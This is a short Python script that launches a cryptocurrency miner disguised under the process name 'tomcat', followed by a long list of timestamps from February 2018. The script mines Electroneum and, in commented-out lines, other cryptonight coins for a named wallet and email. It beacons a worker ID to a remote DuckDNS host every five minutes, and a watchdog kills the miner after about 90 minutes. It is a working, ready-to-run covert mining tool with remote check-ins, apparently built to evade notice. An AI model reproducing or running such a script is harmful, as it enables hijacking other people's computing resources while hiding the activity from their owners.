import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:15:06.773877
#2018-02-17 17:04:03.928759
#2018-02-17 18:52:04.069072
#2018-02-17 20:40:06.994761
#2018-02-17 22:27:05.351240
#2018-02-18 00:10:08.393794
#2018-02-18 02:03:04.870171
#2018-02-18 03:51:06.578099
#2018-02-18 05:39:01.284590
#2018-02-18 07:32:06.422148
#2018-02-18 09:20:08.196775
#2018-02-18 11:05:07.025926
#2018-02-18 12:52:05.345776
#2018-02-18 14:38:07.473472
#2018-02-18 16:28:05.371554
#2018-02-18 18:17:04.996664
#2018-02-18 20:02:05.617124
#2018-02-18 21:49:03.396669
#2018-02-18 23:38:02.199518
#2018-02-19 01:24:02.195908
#2018-02-19 03:12:01.299500
#2018-02-19 04:57:01.628938
#2018-02-19 06:42:01.306495
#2018-02-19 08:31:06.228453
#2018-02-19 10:20:08.631412
#2018-02-19 12:08:04.334064
#2018-02-19 13:55:01.459615
#2018-02-19 15:45:12.596256
#2018-02-19 17:33:06.287128
#2018-02-19 19:19:07.610465
#2018-02-19 21:07:06.659521
#2018-02-19 22:54:03.622497
#2018-02-20 00:37:02.226665
#2018-02-20 02:26:03.880802
#2018-02-20 04:17:01.809626
#2018-02-20 06:01:04.272965
#2018-02-20 07:46:04.763239
#2018-02-20 09:29:07.436620
#2018-02-20 11:13:01.260966
#2018-02-20 13:01:07.663983
#2018-02-20 14:45:08.787236
#2018-02-20 16:33:09.570535
#2018-02-20 18:20:08.090709
#2018-02-20 20:12:02.154586
#2018-02-20 21:59:08.215501
#2018-02-20 23:42:01.822697
#2018-02-21 01:25:09.992001
#2018-02-21 03:15:08.133078
#2018-02-21 05:04:04.852695
#2018-02-21 06:52:02.183633
#2018-02-21 08:38:05.866560
#2018-02-21 10:24:06.539330
#2018-02-21 12:12:08.083292
#2018-02-21 14:02:08.415025
#2018-02-21 15:48:11.111246
#2018-02-21 17:40:12.048343
#2018-02-21 19:27:08.374694
#2018-02-21 21:16:07.506595
#2018-02-21 23:01:02.000875
#2018-02-22 00:49:06.266727
#2018-02-22 02:38:04.747261
#2018-02-22 04:26:06.934994
#2018-02-22 06:12:01.430180
#2018-02-22 07:56:07.234186
#2018-02-22 09:45:08.330722
#2018-02-22 11:30:07.772623
#2018-02-22 13:17:05.131487
#2018-02-22 15:07:04.984753
#2018-02-22 16:52:07.544159
#2018-02-22 18:41:04.039201
#2018-02-22 20:33:08.185900
#2018-02-22 22:18:06.434111
#2018-02-23 00:04:04.441656
#2018-02-23 01:52:02.092927
#2018-02-23 03:40:10.053556
#2018-02-23 05:25:05.764171
#2018-02-23 07:11:03.943619
#2018-02-23 09:16:02.098966
#2018-02-23 11:23:05.452426
#2018-02-23 13:13:08.674768
#2018-02-23 14:58:09.222483
#2018-02-23 16:46:05.986828
#2018-02-23 18:34:08.575524
#2018-02-23 20:22:07.560269
#2018-02-23 22:09:07.850308
#2018-02-23 23:56:05.719292
#2018-02-24 01:46:08.331086
#2018-02-24 03:40:08.465934
#2018-02-24 05:24:01.433106
#2018-02-24 07:12:01.314723
#2018-02-24 09:00:05.125352
#2018-02-24 10:59:05.848108
#2018-02-24 12:48:06.613426
#2018-02-24 14:37:04.468471
#2018-02-24 16:23:06.204373
#2018-02-24 18:17:05.312570
#2018-02-24 20:03:05.209795
#2018-02-24 21:45:07.162974
#2018-02-25 00:43:03.752655
#2018-02-25 04:38:01.923272
#2018-02-25 08:03:07.381664